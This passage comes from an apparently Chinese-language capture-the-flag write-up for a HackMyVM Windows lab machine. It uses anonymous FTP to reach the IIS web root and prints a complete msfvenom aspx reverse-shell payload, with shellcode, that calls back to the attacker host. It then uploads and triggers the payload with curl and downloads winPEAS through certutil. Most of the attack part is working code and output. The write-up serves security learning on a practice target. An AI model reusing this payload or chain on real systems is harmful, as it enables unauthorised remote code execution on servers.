\/umbraco\/webservices\/codeEditorSave.asmx\n[08:48:07] 404 - 1KB - \/WebResource.axd?d=LER8t9aS\n\nTask Completed<\/code><\/pre>\n\u6f0f\u6d1e\u53d1\u73b0<\/h2>\n\u8e29\u70b9<\/h3>\n
<\/div><\/p>\n\u67e5\u770b\u6e90\u4ee3\u7801\u4f46\u662f\u5e76\u672a\u53d1\u73b0\u6709\u4e9b\u5565\uff0c\u5c1d\u8bd5\u522b\u7684\u65b9\u5411\u3002<\/p>\n
ftp\u670d\u52a1\u63a2\u6d4b<\/h3>\n
\u524d\u9762\u63a2\u6d4b\u5230\u53ef\u4ee5\u8fdb\u884c\u533f\u540d\u767b\u5f55\uff0c\u5c1d\u8bd5\u770b\u4e00\u4e0b\u6709\u4e9b\u5565\uff1a<\/p>\n
\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/quoted]\n\u2514\u2500$ ftp $IP\nConnected to 192.168.10.105.\n220 Microsoft FTP Service\nName (192.168.10.105:kali): anonymous\n331 Anonymous access allowed, send identity (e-mail name) as password.\nPassword: \n230 User logged in.\nRemote system type is Windows_NT.\nftp> mget *\nmget iisstart.htm [anpqy?]? \n229 Entering Extended Passive Mode (|||49162|)\n125 Data connection already open; Transfer starting.\n100% |************************************************************************************************************************************************| 689 0.98 MiB\/s 00:00 ETA\n226 Transfer complete.\n689 bytes received in 00:00 (507.42 KiB\/s)\nmget welcome.png [anpqy?]? \n229 Entering Extended Passive Mode (|||49163|)\n150 Opening ASCII mode data connection.\n100% |************************************************************************************************************************************************| 180 KiB 3.80 MiB\/s 00:00 ETA\n226 Transfer complete.\nWARNING! 820 bare linefeeds received in ASCII mode.\nFile may not have transferred correctly.\n184946 bytes received in 00:00 (3.75 MiB\/s)<\/code><\/pre>\n\u7136\u540e\u53d1\u73b0\u6b63\u662fweb\u7684\u76ee\u5f55\uff1a<\/p>\n
\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/quoted]\n\u2514\u2500$ cat iisstart.htm\n<!DOCTYPE html PUBLIC "-\/\/W3C\/\/DTD XHTML 1.0 Strict\/\/EN" "http:\/\/www.w3.org\/TR\/xhtml1\/DTD\/xhtml1-strict.dtd">\n<html xmlns="http:\/\/www.w3.org\/1999\/xhtml">\n<head>\n<meta http-equiv="Content-Type" content="text\/html; charset=iso-8859-1" \/>\n<title>IIS7<\/title>\n<style type="text\/css">\n<!--\nbody {\n color:#000000;\n background-color:#B3B3B3;\n margin:0;\n}\n\n#container {\n margin-left:auto;\n margin-right:auto;\n text-align:center;\n }\n\na img {\n border:none;\n}\n\n-->\n<\/style>\n<\/head>\n<body>\n<div id="container">\n<a href="http:\/\/go.microsoft.com\/fwlink\/?linkid=66138&clcid=0x409"><img src="welcome.png" alt="IIS7" width="571" height="411" \/><\/a>\n<\/div>\n<\/body>\n<\/html> \n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/quoted]\n\u2514\u2500$ curl -s http:\/\/$IP\/\n<!DOCTYPE html PUBLIC "-\/\/W3C\/\/DTD XHTML 1.0 Strict\/\/EN" "http:\/\/www.w3.org\/TR\/xhtml1\/DTD\/xhtml1-strict.dtd">\n<html xmlns="http:\/\/www.w3.org\/1999\/xhtml">\n<head>\n<meta http-equiv="Content-Type" content="text\/html; charset=iso-8859-1" \/>\n<title>IIS7<\/title>\n<style type="text\/css">\n<!--\nbody {\n color:#000000;\n background-color:#B3B3B3;\n margin:0;\n}\n\n#container {\n margin-left:auto;\n margin-right:auto;\n text-align:center;\n }\n\na img {\n border:none;\n}\n\n-->\n<\/style>\n<\/head>\n<body>\n<div id="container">\n<a href="http:\/\/go.microsoft.com\/fwlink\/?linkid=66138&clcid=0x409"><img src="welcome.png" alt="IIS7" width="571" height="411" \/><\/a>\n<\/div>\n<\/body>\n<\/html><\/code><\/pre>\n\u8fdb\u884c\u63a2\u6d4b\uff0c\u770b\u4e00\u4e0b\u662f\u5426\u53ef\u4ee5\u4e0a\u4f20shell\uff01\u56e0\u4e3a\u662fIIS<\/code>\u6240\u4ee5\u5c1d\u8bd5\u4e0a\u4f20\u7684\u4e3aaspx<\/code>\u7684shell\u3002\u3002<\/p>\n\u4e0a\u4f20aspx\u53cd\u5f39shell<\/h3>\n
\u9996\u5148\u6211\u4eec\u9700\u8981\u4e00\u4e2a.aspx<\/code>\u7684\u6728\u9a6c\uff0c\u53ef\u4ee5\u627e\u73b0\u6210\u7684\uff0c\u4e5f\u53ef\u4ee5\u76f4\u63a5\u4f7f\u7528msf\u751f\u6210\u4e00\u4e2a\uff1a<\/p>\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/quoted]\n\u2514\u2500$ msfvenom -p windows\/x64\/shell_reverse_tcp lhost=192.168.10.106 lport=1234 -f aspx\n[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload\n[-] No arch selected, selecting arch: x64 from the payload\nNo encoder specified, outputting raw payload\nPayload size: 460 bytes\nFinal size of aspx file: 3407 bytes\n<%@ Page Language="C#" AutoEventWireup="true" %>\n<%@ Import Namespace="System.IO" %>\n<script runat="server">\n private static Int32 MEM_COMMIT=0x1000;\n private static IntPtr PAGE_EXECUTE_READWRITE=(IntPtr)0x40;\n\n [System.Runtime.InteropServices.DllImport("kernel32")]\n private static extern IntPtr VirtualAlloc(IntPtr lpStartAddr,UIntPtr size,Int32 flAllocationType,IntPtr flProtect);\n\n [System.Runtime.InteropServices.DllImport("kernel32")]\n private static extern IntPtr CreateThread(IntPtr lpThreadAttributes,UIntPtr dwStackSize,IntPtr lpStartAddress,IntPtr param,Int32 dwCreationFlags,ref IntPtr lpThreadId);\n\n protected void Page_Load(object sender, EventArgs e)\n {\n byte[] my9L = new byte[460] {0xfc,0x48,0x83,0xe4,0xf0,0xe8,0xc0,0x00,0x00,0x00,0x41,0x51,0x41,0x50,\n0x52,0x51,0x56,0x48,0x31,0xd2,0x65,0x48,0x8b,0x52,0x60,0x48,0x8b,0x52,0x18,0x48,0x8b,0x52,0x20,0x48,\n0x8b,0x72,0x50,0x48,0x0f,0xb7,0x4a,0x4a,0x4d,0x31,0xc9,0x48,0x31,0xc0,0xac,0x3c,0x61,0x7c,0x02,0x2c,\n0x20,0x41,0xc1,0xc9,0x0d,0x41,0x01,0xc1,0xe2,0xed,0x52,0x41,0x51,0x48,0x8b,0x52,0x20,0x8b,0x42,0x3c,\n0x48,0x01,0xd0,0x8b,0x80,0x88,0x00,0x00,0x00,0x48,0x85,0xc0,0x74,0x67,0x48,0x01,0xd0,0x50,0x8b,0x48,\n0x18,0x44,0x8b,0x40,0x20,0x49,0x01,0xd0,0xe3,0x56,0x48,0xff,0xc9,0x41,0x8b,0x34,0x88,0x48,0x01,0xd6,\n0x4d,0x31,0xc9,0x48,0x31,0xc0,0xac,0x41,0xc1,0xc9,0x0d,0x41,0x01,0xc1,0x38,0xe0,0x75,0xf1,0x4c,0x03,\n0x4c,0x24,0x08,0x45,0x39,0xd1,0x75,0xd8,0x58,0x44,0x8b,0x40,0x24,0x49,0x01,0xd0,0x66,0x41,0x8b,0x0c,\n0x48,0x44,0x8b,0x40,0x1c,0x49,0x01,0xd0,0x41,0x8b,0x04,0x88,0x48,0x01,0xd0,0x41,0x58,0x41,0x58,0x5e,\n0x59,0x5a,0x41,0x58,0x41,0x59,0x41,0x5a,0x48,0x83,0xec,0x20,0x41,0x52,0xff,0xe0,0x58,0x41,0x59,0x5a,\n0x48,0x8b,0x12,0xe9,0x57,0xff,0xff,0xff,0x5d,0x49,0xbe,0x77,0x73,0x32,0x5f,0x33,0x32,0x00,0x00,0x41,\n0x56,0x49,0x89,0xe6,0x48,0x81,0xec,0xa0,0x01,0x00,0x00,0x49,0x89,0xe5,0x49,0xbc,0x02,0x00,0x04,0xd2,\n0xc0,0xa8,0x0a,0x6a,0x41,0x54,0x49,0x89,0xe4,0x4c,0x89,0xf1,0x41,0xba,0x4c,0x77,0x26,0x07,0xff,0xd5,\n0x4c,0x89,0xea,0x68,0x01,0x01,0x00,0x00,0x59,0x41,0xba,0x29,0x80,0x6b,0x00,0xff,0xd5,0x50,0x50,0x4d,\n0x31,0xc9,0x4d,0x31,0xc0,0x48,0xff,0xc0,0x48,0x89,0xc2,0x48,0xff,0xc0,0x48,0x89,0xc1,0x41,0xba,0xea,\n0x0f,0xdf,0xe0,0xff,0xd5,0x48,0x89,0xc7,0x6a,0x10,0x41,0x58,0x4c,0x89,0xe2,0x48,0x89,0xf9,0x41,0xba,\n0x99,0xa5,0x74,0x61,0xff,0xd5,0x48,0x81,0xc4,0x40,0x02,0x00,0x00,0x49,0xb8,0x63,0x6d,0x64,0x00,0x00,\n0x00,0x00,0x00,0x41,0x50,0x41,0x50,0x48,0x89,0xe2,0x57,0x57,0x57,0x4d,0x31,0xc0,0x6a,0x0d,0x59,0x41,\n0x50,0xe2,0xfc,0x66,0xc7,0x44,0x24,0x54,0x01,0x01,0x48,0x8d,0x44,0x24,0x18,0xc6,0x00,0x68,0x48,0x89,\n0xe6,0x56,0x50,0x41,0x50,0x41,0x50,0x41,0x50,0x49,0xff,0xc0,0x41,0x50,0x49,0xff,0xc8,0x4d,0x89,0xc1,\n0x4c,0x89,0xc1,0x41,0xba,0x79,0xcc,0x3f,0x86,0xff,0xd5,0x48,0x31,0xd2,0x48,0xff,0xca,0x8b,0x0e,0x41,\n0xba,0x08,0x87,0x1d,0x60,0xff,0xd5,0xbb,0xf0,0xb5,0xa2,0x56,0x41,0xba,0xa6,0x95,0xbd,0x9d,0xff,0xd5,\n0x48,0x83,0xc4,0x28,0x3c,0x06,0x7c,0x0a,0x80,0xfb,0xe0,0x75,0x05,0xbb,0x47,0x13,0x72,0x6f,0x6a,0x00,\n0x59,0x41,0x89,0xda,0xff,0xd5};\n\n IntPtr vIGwqi5 = VirtualAlloc(IntPtr.Zero,(UIntPtr)my9L.Length,MEM_COMMIT, PAGE_EXECUTE_READWRITE);\n System.Runtime.InteropServices.Marshal.Copy(my9L,0,vIGwqi5,my9L.Length);\n IntPtr kHduZ8ZlHs = IntPtr.Zero;\n IntPtr nDx9WQ2UEd = CreateThread(IntPtr.Zero,UIntPtr.Zero,vIGwqi5,IntPtr.Zero,0,ref kHduZ8ZlHs);\n }\n<\/script>\n\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/quoted]\n\u2514\u2500$ msfvenom -p windows\/x64\/shell_reverse_tcp lhost=192.168.10.106 lport=1234 -f aspx > shell.aspx\n[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload\n[-] No arch selected, selecting arch: x64 from the payload\nNo encoder specified, outputting raw payload\nPayload size: 460 bytes\nFinal size of aspx file: 3409 bytes<\/code><\/pre>\n\u5c1d\u8bd5\u4e0a\u4f20\uff1a<\/p>\n
\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/quoted]\n\u2514\u2500$ ftp $IP\nConnected to 192.168.10.105.\n220 Microsoft FTP Service\nName (192.168.10.105:kali): anonymous\n331 Anonymous access allowed, send identity (e-mail name) as password.\nPassword: \n230 User logged in.\nRemote system type is Windows_NT.\nftp> put shell.aspx \nlocal: shell.aspx remote: shell.aspx\n229 Entering Extended Passive Mode (|||49166|)\n150 Opening ASCII mode data connection.\n100% |************************************************************************************************************************************************| 3454 36.19 MiB\/s --:-- ETA\n226 Transfer complete.\n3454 bytes sent in 00:00 (1.33 MiB\/s)\nftp> exit\n221 Goodbye.\n\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/quoted]\n\u2514\u2500$ curl -s http:\/\/$IP\/shell.aspx<\/code><\/pre>\n\u53d1\u73b0\u5f39\u8fc7\u6765\u4e86\uff01<\/p>\n
<\/div><\/p>\n\u63d0\u6743<\/h2>\n\u4fe1\u606f\u641c\u96c6<\/h3>\n
\u53c8\u662fwindows\u9776\u673a\uff0c\u8fd9\u6bb5\u65f6\u95f4\u505a\u4e86\u597d\u51e0\u4e2a\u4e86\uff0c\u5c1d\u8bd5\u4e0a\u4f20WinPEAS<\/code>\u8fdb\u884c\u4fe1\u606f\u641c\u96c6\uff01<\/p>\nc:\\Users\\quoted\\Desktop>dir\ndir\n C s\ufffdr\ufffdc\ufffds\ufffdndeki birimin etiketi yok.\n Birim Seri Numaras\ufffd: D4DC-8644\n\n c:\\Users\\quoted\\Desktop dizini\n\n06.10.2024 17:25 <DIR> .\n06.10.2024 17:25 <DIR> ..\n06.10.2024 17:25 23 user.txt\n 1 Dosya 23 bayt\n 2 Dizin 22.207.266.816 bayt bo\ufffd\n\nc:\\Users\\quoted\\Desktop>type user.txt\ntype user.txt\nHMV{User_Flag_Obtained}\nc:\\Users\\quoted\\Desktop>certutil -urlcache -split -f http:\/\/192.168.10.106:8888\/winPEAS.bat\ncertutil -urlcache -split -f http:\/\/192.168.10.106:8888\/winPEAS.bat\n**** \ufffdevrimi\ufffdi ****\n 0000 ...\n 9056\nCertUtil: -URLCache komutu ba\ufffdar\ufffdyla tamamland\ufffd.\n\nc:\\Users\\quoted\\Desktop>whoami \/all\nwhoami \/all\n\nKULLANICI B\ufffdLG\ufffdLER\ufffd\n-------------------\n\nKullan\ufffdc\ufffd ad\ufffd SID \n============================ ========\nnt authority\\network service S-1-5-20\n\nGRUP B\ufffdLG\ufffdLER\ufffd\n--------------\n\nGrup Ad\ufffd T\ufffdr SID \ufffdznitelikler \n==================================== ================ ============================================================= ============================================================\nZorunlu Etiket\\Sistem Zorunlu D\ufffdzeyi Etiket S-1-16-16384 \nEveryone \ufffdyi bilinen grup S-1-1-0 Zorunlu grup, Varsay\ufffdlan olarak etkin, Etkinle\ufffdtirilmi\ufffd grup\nBUILTIN\\Users Di\ufffder Ad S-1-5-32-545 Zorunlu grup, Varsay\ufffdlan olarak etkin, Etkinle\ufffdtirilmi\ufffd grup\nNT AUTHORITY\\SERVICE \ufffdyi bilinen grup S-1-5-6 Zorunlu grup, Varsay\ufffdlan olarak etkin, Etkinle\ufffdtirilmi\ufffd grup\nKONSOL OTURUMU A\ufffdMA \ufffdyi bilinen grup S-1-2-1 Zorunlu grup, Varsay\ufffdlan olarak etkin, Etkinle\ufffdtirilmi\ufffd grup\nNT AUTHORITY\\Authenticated Users \ufffdyi bilinen grup S-1-5-11 Zorunlu grup, Varsay\ufffdlan olarak etkin, Etkinle\ufffdtirilmi\ufffd grup\nNT AUTHORITY\\This Organization \ufffdyi bilinen grup S-1-5-15 Zorunlu grup, Varsay\ufffdlan olarak etkin, Etkinle\ufffdtirilmi\ufffd grup\nBUILTIN\\IIS_IUSRS Di\ufffder Ad S-1-5-32-568 Zorunlu grup, Varsay\ufffdlan olarak etkin, Etkinle\ufffdtirilmi\ufffd grup\nLOCAL \ufffdyi bilinen grup S-1-2-0 Zorunlu grup, Varsay\ufffdlan olarak etkin, Etkinle\ufffdtirilmi\ufffd grup\nIIS APPPOOL\\DefaultAppPool \ufffdyi bilinen grup S-1-5-82-3006700770-424185619-1745488364-794895919-4004696415 Zorunlu grup, Varsay\ufffdlan olarak etkin, Etkinle\ufffdtirilmi\ufffd grup\n\nAYRICALIK B\ufffdLG\ufffdLER\ufffd\n----------------------\n\nAyr\ufffdcal\ufffdk Ad\ufffd A\ufffd\ufffdklama Durum \n============================= ======================================================== ==========\nSeAssignPrimaryTokenPrivilege \ufffd\ufffdlem d\ufffdzeyi belirtecini de\ufffdi\ufffdtir Devre D\ufffd\ufffd\ufffd\nSeIncreaseQuotaPrivilege \ufffd\ufffdlem i\ufffdin bellek kotalar\ufffd ayarla Devre D\ufffd\ufffd\ufffd\nSeSecurityPrivilege Denetimi ve g\ufffdvenlik g\ufffdnl\ufffd\ufffd\ufffdn\ufffd y\ufffdnet Devre D\ufffd\ufffd\ufffd\nSeShutdownPrivilege Sistemi kapat Devre D\ufffd\ufffd\ufffd\nSeAuditPrivilege G\ufffdvenlik denetimleri olu\ufffdtur Devre D\ufffd\ufffd\ufffd\nSeChangeNotifyPrivilege \ufffdapraz ge\ufffdi\ufffd denetimini atla Etkin \nSeUndockPrivilege Bilgisayar\ufffd takma biriminden \ufffd\ufffdkar Devre D\ufffd\ufffd\ufffd\nSeImpersonatePrivilege Kimlik do\ufffdrulamas\ufffdndan sonra istemcinin \ufffdzelliklerini al Etkin \nSeCreateGlobalPrivilege Genel nesneler olu\ufffdtur Etkin \nSeIncreaseWorkingSetPrivilege \ufffd\ufffdlem \ufffdal\ufffd\ufffdma k\ufffdmesini art\ufffdr Devre D\ufffd\ufffd\ufffd\nSeTimeZonePrivilege Saat dilimini de\ufffdi\ufffdtir <\/code><\/pre>\n\n
![\"image-20250608210017295\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506082235156.png\")
<\/div><\/p>\n![\"image-20250608213349971\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506082235157.png\")
<\/div><\/p>\n![\"image-20250608222004381\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506082235158.png\")
<\/div><\/p>\n![\"image-20250608222825478\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506082235159.png\")
<\/div><\/p>\n![\"image-20250608223401991\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506082235160.png\")
<\/div><\/p>\n